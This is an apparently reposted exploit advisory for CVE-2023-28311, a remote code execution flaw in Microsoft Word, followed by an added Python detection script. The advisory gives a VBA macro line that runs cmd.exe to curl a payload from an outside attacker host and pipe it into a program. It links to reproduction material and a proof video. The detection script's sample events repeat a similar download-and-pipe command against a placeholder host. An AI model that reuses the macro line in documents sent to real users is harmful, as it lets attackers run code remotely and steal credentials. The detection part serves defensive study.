- Microsoft Word Remote Code Execution
- Authored by nu11secur1ty
- Microsoft Word appears to suffer from a remote code execution vulnerability when a user loads a malicious file that reaches out to an attacker-controlled server to get a hostile payload.
- advisories | CVE-2023-28311
- SHA-256 | 8ab600383b2980700b22b249418126bff6776fde4672ab8d2e1bbd8b3c50a7f2
## Title: Microsoft Word Remote Code Execution Vulnerability
## Author: nu11secur1ty
## Date: 04.14.2023
## Vendor: https://www.microsoft.com/
## Software:
https://www.microsoft.com/en-us/microsoft-365/word?activetab=tabs%3afaqheaderregion3
## Reference:
https://www.crowdstrike.com/cybersecurity-101/remote-code-execution-rce/
## CVE-2023-28311
## Description:
The attack itself is carried out locally by a user with authentication to
the targeted system. An attacker could exploit the vulnerability by
convincing a victim, through social engineering, to download and open a
specially crafted file from a website, which could lead to a local attack on
the victim's computer. The attacker can trick the victim into opening a
malicious web page by using a malicious `Word` file, and can then steal
credentials and bank account information, and sniff and track all of the
victim's traffic continuously, depending on the scenario.
STATUS: HIGH Vulnerability
[+]Exploit:
The exploit server must be BROADCASTING at the moment when the victim hits
the button of the exploit!
```vbs
Call Shell("cmd.exe /S /c" & "curl -s http://tarator.com/ChushkI/ebanie.tarator | tarator", vbNormalFocus)
```
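A defender-side check for the behaviour shown above, as an added example that is not part of the original advisory: it flags process-creation events where an Office application spawns a command interpreter, and raises the severity when the command line pipes a download into another program. The event field names are assumed to follow Sysmon Event ID 1; the function names, sample events and host names are constructed for illustration.

```python
import re

# Assumed field names follow Sysmon Event ID 1 (process creation).
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe"}
# A fetch tool, a URL, then a pipe into another program. No word boundary is
# required before the tool name: the macro's "/c" & "curl" concatenation
# yields "/ccurl" with no separating space.
FETCH_PIPE = re.compile(
    r"(?:curl|wget|certutil)(?:\.exe)?\s[^|]*?(https?://[^\s|\"']+)[^|]*\|\s*\S+",
    re.IGNORECASE)

def basename(path):
    """Lower-cased file name taken from a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(event):
    """Return (severity, fetched_url) for one process-creation event."""
    parent = basename(event.get("ParentImage", ""))
    child = basename(event.get("Image", ""))
    if parent not in OFFICE_PARENTS or child not in SHELLS:
        return ("none", None)
    match = FETCH_PIPE.search(event.get("CommandLine", ""))
    if match:
        return ("high", match.group(1))   # download piped into a program
    return ("medium", None)               # Office spawned an interpreter

def scan(events):
    """Return [(index, severity, url)] for events that need triage."""
    hits = []
    for i, ev in enumerate(events):
        severity, url = classify(ev)
        if severity != "none":
            hits.append((i, severity, url))
    return hits

WORD = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
CMD = r"C:\Windows\System32\cmd.exe"
# Constructed sample events, not taken from a real host.
SAMPLE = [
    {"ParentImage": WORD, "Image": CMD,
     "CommandLine": "cmd.exe /S /ccurl -s http://stage.example.test/a.txt | runner"},
    {"ParentImage": WORD, "Image": CMD, "CommandLine": "cmd.exe /c dir"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": CMD,
     "CommandLine": "cmd.exe /c curl -s http://stage.example.test/a.txt | runner"},
    {"ParentImage": WORD, "Image": r"C:\Windows\splwow64.exe",
     "CommandLine": "splwow64.exe 8192"},
]
```

`scan(SAMPLE)` reports the first event as high severity with the fetched URL and the second as medium; the shell started from Explorer and the non-shell child of Word are not reported.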
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-28311)
## Reference:
[href](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-28311)
[href](https://www.crowdstrike.com/cybersecurity-101/remote-code-execution-rce/)
## Proof and Exploit
[href](https://streamable.com/s60x3k)
## Time spent:
01:00:00